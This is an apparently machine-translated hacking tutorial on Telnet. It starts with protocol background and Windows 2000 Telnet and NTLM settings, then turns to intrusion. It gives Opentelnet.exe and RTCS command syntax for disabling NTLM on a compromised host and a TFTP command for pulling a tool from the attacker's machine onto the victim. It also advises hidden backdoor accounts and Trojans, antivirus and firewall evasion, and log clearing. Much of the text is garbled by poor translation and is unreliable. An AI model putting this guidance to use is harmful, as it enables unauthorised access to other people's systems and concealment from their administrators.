A summary
The Telnet application not only makes it easy for us to log in, but also provides another intrusion and back door to Hacker, but in any case, do you really understand Telnet? ?
Second remote login
Although Telnet services belong to the service of the client / server model, its greater significance is to implement remote login based on Telnet protocol (remote interactive calculations), let us know the remote login.
1 Basic concept of remote login
Let's take a look at what is logged in: Time-time system allows multiple users to use a computer at the same time, in order to ensure the safety and bill of system, the system requires that each user has a separate account as the login ID, the system is also for each user Specifies a password. The user is input to the ID and password before using the system. This process is called 'login'.
Remote login means that the user uses the telnet command to make your computer temporarily become a process of simulating a remote host. The simulation terminal is equivalent to a non-intelligent machine, which is only responsible for passing each character entered to the host, and then returns each message output from the host on the screen.
2 generation and development of remote logins
We can first conceive a service providing remote text editing, and the implementation of this service requires a server that accepts editing file requests and data and a client that sends this request. The client will establish a TCP connection from the local machine to the server, of course, this requires the server's response, then sends typed information (file editing information) and read the output returned from the server. The above is a standard and a normal client / server model service.
It seems that there is a service of the client / server model, and all remote issues can be solved. However, it is not as simple as you think. If we need remote editing files, then the services that have just been conceived are completely competent, but if our requirements are not so simple, we also want to achieve remote user management, remote data entry, remote System maintenance, want to implement all the operations that can be implemented on the remote host, then we will need a large number of dedicated server programs and use a server process for each could computable service, and the problem is: Remote machine will be very fast The server process should be lifted, and drown in the ocean in the process (we exclude the most professional remote machine here).
So is there a way to solve it? Of course, we can use remote login to solve it all. We allow users to build a login session on the remote machine, and then achieve more services by executing commands, just like local operations. This way, we can access all available commands on the remote system, and the system designer does not need to provide multiple dedicated server programs.
The problem has developed here, like a bright future, you should solve the problem with remote login, but it is not simple to implement remote login. Computer systems that do not consider network design expect users to log in from directly connected keyboards and displays, adding remote login functions on such machines to modify the machine's operating system, which is extremely arduous and we try to avoid it. Therefore, we should concentrate on constructing remote login server software, although this is more difficult. Why do you say this is also more difficult?
For example, the operating system will assign special meanings for some special buttons, such as the local system interprets 'ctrl c' to: 'Termination of the currently running command process'. But suppose we have already running the remote login server software, 'Ctrl C' may not be transferred to the remote machine, if the client really passes the 'Ctrl C' to the remote machine, then 'ctrl c' this The order may not terminate the local process, that is, it is likely to be confusing here. And this is just one of the problems encountered. However, despite technical difficulties, system programmers are also trying to construct remote login server software that can be applied to most operating systems, and constructs applications that act as clients. Typically, the client software cancels the local interpretation of all keys other than one key, and the corresponding conversion of these local interprets is distinctly explained, which makes the client software interacts with the remote machine, just like sitting in the remote host. As in front of it, it avoids the chaos mentioned above. And the only exceptional key allows the user to return to the local environment.
Designed remote login servers as applying level software, there is another requirement, that is, the operating system is required to provide support for pseudo terminals (Pseudo Terminal). We describe the entry point of the operating system with a pseudo terminal, which allows the same program to the operating system like a Telnet server, and makes the character image from the local keyboard. Only using such an operating system can be designed as applying level software (such as Telnet Server Software), otherwise, local operating systems and remote system transfer will not recognize information transferred from each other (because they can only recognize The information typed in the local keyboard), and the remote login will be announced.
Designing remote login servers for application level software, although there is a significant advantage: more easy to modify and control the server than to embed operating systems. However, it also has a shortcoming of high efficiency (the later content will be given), so that the user typing information is not high, this design is still acceptable.
3 Working process of remote login
The following conditions need to be met when using the Telnet protocol: You must have a client that contains Telnet protocols on this computer; you must know the IP address or domain name of the remote host; you must know the login ID and password.
Telnet remote login service is divided into four processes:
1) Establish a connection with the remote host. The process is actually established a TCP connection, and the user must know the IP address or domain name of the remote host;
2) Transfer any command or characters entered on the local terminal and after the Net Virtual Terminal format to the remote host. The process actually sends an IP datagram from the local host to the remote host;
3) Transform data from the NVT format output from the remote host to the local terminal accepted the local terminal, including the input command echo and command execution result;
4) Finally, the local terminal revokes the remote host. This process is to revoke a TCP connection.
The above content just discussed the most basic things remotely logged in, the complex and programmers' hardships were unimaginable. I didn't know if you were comfortable to use Telnet.
Three Telnet protocol
We know that Telnet server software is our most commonly used remote login server software, is a typical client / server model service that applies Telnet protocols. So what is the Telnet protocol? What are it characteristics?
1 basic content
The Telnet protocol is a member of the TCP / IP protocol, which is the standard protocol for Internet remote login services. The Telnet protocol can turn the computer used by the local user into a terminal of the remote host system. It provides three basic services: 1) Telnet defines a network virtual terminal to provide a standard interface. The client program does not have to learn from the remote system in detail, and they only need to construct the program that uses the standard interface;
2) Telnet includes a mechanism that allows client and server negotiation options, and it also provides a set of standard options;
3) Telnet symmetrically handles both ends of the connection, that is, Telnet does not force the client from the keyboard input, or forcing the client to display the output on the screen.
2 adapt to heterogenesis
In order to make a Telnet interaction between multiple operating systems, it is possible to learn more about heterogeneous computers and operating systems. For example, some operating systems require each line to end with the ASCII Enter Control (CR), and other systems need to use the ASCII wrap (LF), and some systems need to enter the sequence of two characters - Renewal (Cr) -LF); for example, most operating systems provide users with shortcuts for interrupt programs run, but this shortcut may be different in each system (some systems use Ctrl C, while others use ESCAPE). If it is not considered to be isomerism between the system, the character or command sent locally or command is transmitted to the distance and is interpreted by the remote system, it is likely to be inaccurate or an error occurs. Therefore, the Telnet protocol must solve this problem.
In order to adapt to the heterogeneous environment, the Telnet protocol defines the transmission mode of the data and commands on the Internet, which is referred to as a network virtual terminal NVT (Net Virtual Terminal). Its application process is as follows:
For the transmitted data: The client software converts the buttons and command sequences from the user terminal to NVT format, and sends to the server, the server software will receive the data and commands from the NVT format to the format required by the remote system;
For returned data: The remote server converts data from the format of the remote machine to NVT format, and the local client will convert the received NVT format data to a local format.
For detailed definitions in NVT format, interested friends can find relevant information.
3 transfer far orders
We know that most of the operating systems provide various shortcuts to implement the corresponding control commands. When the user typed these shortcuts in the local terminal, the local system will execute the corresponding control command without using these shortcuts as input. So what is it used for Telnet? What is the remote transmission of the control command?
Telnet also uses NVT to define how to transfer control functions to the server from the client. We know that the USASCII character set includes 95 printable characters and 33 control codes. When the user types a normal character from locally, NVT will be transmitted according to its original meaning; when the user types the shortcut (key), the NVT will convert it to a special ASCII character to transmit it on the network, and arrive at the remote machine After converting to the corresponding control command. There are two main reasons to distinguish between the normal ASCII character set and the control command:
1) This distinction means that Telnet has greater flexibility: it can transmit all possible ASCII characters and all control functions between clients and servers;
2) This distinction allows the client to specify signaling without means, without the confusion of control functions and ordinary characters.
4 data flow direction
Above we mentioned that there is a shortcoming of the Telnet design as the application level software, that is: the efficiency is not high. Why is this? The data flow in Telnet is given below:
The data information is typed by the user from the local keyboard and passed the operating system to the client program. After the client program is processed, it returns its operating system, and is transmitted from the operating system to the remote machine, and the remote operating system will receive the received data. Give the server program and return to the dummy terminal entry point on the operating system after processing again, and finally, the remote operating system transmits the data to the user being running, this is a complete input process; output will Transfer from the server from the server to the client according to the same path. Because each input and output, the computer will switch the process environment several times, this overhead is very expensive. Fortunately, the type of user is not high, this shortcomings are still acceptable.
5 forced order
We should consider such a situation: assuming that the local user runs an error command or program that has an endless loop of the remote machine, and this command or program has stopped reading input, then the buffer of the operating system may be occupied Full, if so, the remote server cannot write data to the pseudo terminal, and ultimately lead to stopping the read data from the TCP connection, and the buffer connected to the TCP will ultimately be full, causing blocking the data stream from flowing into this connection. If the above is really happening, the local user will lose control of the remote machine.
To resolve this issue, the Telnet protocol must use an outer signal order to force the server to read a control command. We know that TCP implements takes data signaling with emergency data mechanisms, then Telnet will add a reservation eight group called data mark (Date Mark), and send the TCP to send a report segment that has set emergency data bits. The server is OK, and the newspapers carrying emergency data will reach the server directly from the traffic control. As a corresponding to the emergency signaling, the server will read and discard all data until a data tag is found. The server will return a normal processing process after encountering the data tag.
6 option negotiation
Due to the isomer of the machine and operating system at both ends of Telnet, the Telnet is not possible to specify the detailed configuration of each Telnet connection, otherwise it will greatly affect the adaptive isomer of Telnet. Therefore, Telnet uses an option consultation mechanism to solve this problem.
The Telnet option has a wide range: Some options expand the functionality of the big direction, and some options involve some minor details. For example: A option can control Telnet working in half a duplex or a full-duplex mode (large direction); there is an option to allow the server on the remote machine to determine the user terminal type (small detail).
The negotiation method of the Telnet option is also very interesting, it is symmetrical for each option, that is, any end can issue negotiation applications; any end can accept or reject this application. In addition, if one end is attempting to negotiate an option that does not understand the other end, the end of the receiving request can be simply denied negotiation. Therefore, it is possible to interact with the update, more complex Telnet client server versions to be older, less complex version. If both clients and servers understand new options, they may improve their interactions. Otherwise, they will run together to run with low efficiency but work. All of these designs are to enhance the adaptation of isomer, how important it is to meet the application and development of Telnet.
Some of the principles are discussed above, although we are difficult to get in touch with this level during the use of Telnet, but I think it makes sense, it will bring us many enlightenment. Let's take a look at the Win2000 Telnet service.
(This series of tutorials are not updated regularly, want to get the latest version, please visit the official website: Vegetable Bird Community
http://ccbirds.yeah.net)
Four Win2000 Telnet services
In fact, from the application level, Win2000 Telnet service does not say, most of the content you can get from the Help file, I just put it slightly. 1 Basic configuration
Win2000 provides us with Telnet Clients and Server Programs: Telnet.exe is a client program (TLNTSVR.EXE is a server program, and it also provides us with Telnet server management program TLNTADMN.EXE.
Windows 2000 has a Telnet service by default, but does not start by default. Here is part of the default settings for Telnet services in the Help file:
AllowTrustedDomain: Whether to allow domain users to access. The default is 1, allowing letter to domain users to access. Can be changed to 0: Domain users are not allowed (only local users only).
DEFAULTDOMAIN: You can set any domain settings with the computer with trust. The default is ".".
Defaultshell: Displays the path location of the shell installation. The default is:% systemroot% / system32 / cmd.exe / q / K
MaxFailedLogins: The maximum number of times that the attempt to log in to fail before the connection is terminated. The default is 3.
Loginscript: Displays the path location of the Telnet server login script. The default location is "% systemroot% / system32 / login.cmd", you can change the script content, so you can log in into Telnet, you are different.
NTLM: NTLM Authentication option. The default is 2. There can be these values below:
0: No NTLM authentication is used.
1: Try the NTLM authentication first, if it fails, use the username and password.
2: Only NTLM authentication is used.
Telnetport: Displays the port of the Telnet server to listen to the Telnet request. The default is: 23. You can also change to other ports.
The above settings You can use TLNTADMN.EXE (Telnet Server Manager) to make a very convenient configuration, you need to restart the Telnet service after configuration. Figure 1
2 NTLM
I can't mention NTLM, I think this is also a thing that makes the invader's most headache, even if you get the administrator account and password, you want to simply pass NTLM is not easy, and the Telnet in Win2000 is only NTLM way to verify the identity, which makes us have to pay attention to NTLM, so what is NTLM?
The early SMB protocol transmits a password on the network. Later, "Lan Manager Challenge / Response" verification mechanism, referred to as LM, it is very simple to be very easy to crack, Microsoft then proposes a WindowsNT challenge / response verification mechanism, NTLM. Now there is an updated NTLMV2 and Kerberos authentication system. The NTLM workflow is like this:
1. The client first encrypts the current user's password into a password hashing.
2, the client sends its own account to the server, this account is encrypted, and the express delivery is directly transmitted.
3, the server generates a 16-bit random number to the client as a challenge (challenge)
4, the client uses the encrypted password to encrypt this Challenge and then returns this to the server. As a Response (response)
5, the server puts the username, to the client's Challenge, the RESPONSE returned by the client, send the domain controller 6, and the domain controller uses this user name to find this user's password in the SAM password management library, then use This password hash to encrypt Challenge.
7, the domain controller compares two encrypted Challenge, if the same is successful.
From the above process, we can see that NTLM sends a login request to the Telnet server as the current user, instead of logging in with the account and password you sweeping, obviously, your login will fail. For example, your machine is called a (local machine), your invaded machine name is B (remote machine), your account on A is xinxin, password is 1234, you sweep to B management The account is administrator, the password is 5678, when you want Telnet to B, NTLM will automatically perform the above 7 operations with the current user's account and password as the login credentials, that is, use xinxin and 1234, but not to use you The Administrator and 5678, and these are automated, do not give you an opportunity to intervene, so your login operation will fail.
Since the Telnet server has three options for NTLM, when you telnet remote machine, one of the following:
1) Authentication option = 0
=====================================
Microsoft (R) WINDOWS (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
Login:
PASSWORD:
/ / Do not use NTML authentication when 0, enter the username and password directly, such as you can enter the sweep to the Administrator and 5678
2) Authentication option = 1
=====================================
NTLM Authentication Failed Due To Insufficient Credentials. Please login withclear text username and password
Microsoft (R) WINDOWS (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
Login:
PASSWORD:
// Try NTLM authentication, if you fail, use the username and password, in fact, this way for us, there is no difference in the previous way.
3) Authentication option = 2
============================================== NTLM Authentication Faled Due to Insufficient Credentials. Please login withclear text username And Password
Server Allows NTLM Authentication Only
Server Has Closed Connection
Lost connection to the host.
C: />
/ / Take a closer look at the above display, did not give you an opportunity to enter the username and password, disconnect directly, sweep the password is also white sweep
So for intruders, NTLM is a mountain in front of us, and we must remove it, usually we have the following methods:
1 Change the Telnet server configuration by modifying the Remote Registry, change the verification mode from 2 to 1 or 0;
2 Use ntlm.exe, run directly after upload, change the Telnet server authentication mode from 2 to 1;
3 Establish a scanned user locally to open the Telnet client as you log in;
4 use software, such as Opentelnet.exe (requires administrator privileges and open IPC pipeline)
5 use scripts, such as RTCs, (requires administrator privileges but does not rely on IPC pipeline)
Basically, the above 5, which are the methods we are more commonly used for Telnet, and the usage methods are very simple, the commands are as follows:
Opentelnet.exe // Server Username Password NTLMAUTHOR TELNETPORT
OpenTelNet.exe // Server address administrator Username Password Verification Mode (Fill 0 or 1) Telnet port
Cscript RTCS.Vbe Targetip Username Password NTLMAUTHOR TELNETPORT
CScript RTCS.VBE
What should I do in Telnet?
It was originally written to the above, but many friends didn't know what to do after telnet. In this case, then I will throw a jade, this time I don't talk about specific practices, just talk about thinking, what? Why don't you talk about specific practices? I will explain one by one later in the future.
1 View system information
Oh, actually, look at it everywhere, look at his system configuration and version (you know the Pro version or Server version with Type C: /Boot.ini), see what services or software installed (you can know from the directory ), See what is important or interesting documents (, if you don't understand abroad, you can't understand), look at his user situation, in short, it is as much as possible, for a while, put the back door .
2 transfer files using TFTP
I would like to have a problem with the transfer of documents in Telnet, because we are used to transfer files in the IPC pipeline, so some friends like to use Net Share IPC $ to open the pipe, and use COPY to transfer files. But then in this way, since we have got the shell, we can use the TFPT command to complete all this, what is TFTP? Using TFTP (TRIVIAL FILE TRANSFER Protocol) to implement file transfer is a UDP-based file transfer, typically using TFTP.exe with Windows, and a TFTP server-side software constitutes a complete transmission structure. It is used in this way: first run the local TFTP Server software and ensure that the transfer is always turned until the transfer is completed, and then in Telnet (Of course you can also in other shells) run the following command:
C: /> TFTP -I IP get xinxin.exe c: /abc/xinxin.exe
Where IP is the IP of your own machine, and upload files should be in the same directory with the TFTP server side, so you can upload xinxin.exe to the C disk ABC directory (actually from the TFTP server)
It should be pointed out that if you use the proxy IP, you will not be able to transfer files with the external network. Because your proxy gateway adds his IP address to your datagram, instead of your internal network address, you can't find your TFTP server when you have MAC addressing in the external network. of.
3 resettlement
After the resettlement, the second step is as if it is early. If you intrusion, there is still other purposes, such as the destruction, or to modify the homepage, then these things can of course do before resettlement; if you just want to get one Brazzle, then there is nothing to say, and behind the door.
There are many kinds of latter doors, but also give us a great choice, which can choose the right back door according to the specific situation. Commonly used lattice generally: Trojan, ASP Trojan, Remote Control Software, Clone Account, Building and Hide Account, Telnet, Telnet Extension Shell, Terminal Services, etc. Having a good back door usually pays attention to the following points:
1 Will not be verified by the firewall and hinder communication: the back door to the virus library is best to step up to escape the firewall, try to communicate with low ports to avoid being blocked by the firewall.
2 Maximize hiddenness: If you choose a remote control software, pay attention to the controlled installation prompt and small icon, and whether you synchronize the screen; if you do an article on your account, you should try it in CMD and user management. Flavings; if you choose to put wood horse or telnet extension, pay attention to the hide of files and processes; if you open a terminal service (not open before the invasion), you must drop 3389 this conspicuous port, and the lower the better.
3 Don't be when the administrator does not exist: this is a taboo. Many friends are really ignorant of the administrator account like 'Hacking' on the machine with only the default account. So when you resettle the back door, think about where the administrator's negligence is.
4 play patch
If you want to dominate the broiler, you will make patch, you have to know that the competition of broilers is fierce. How to play patch? This is also asked? Think how you come in. Forget it, prompt, in addition to repairing large vulnerabilities (uploading official patches and running), pay attention to its sharing, IPC $ sharing (best shut down), suspicious port, easy to use service. However, the patch should also pay attention to concealment, do not let the administrator discover a big change. 5 clear log
Can be manually or utilized, if you don't want to find a related textbook, here I don't detail.
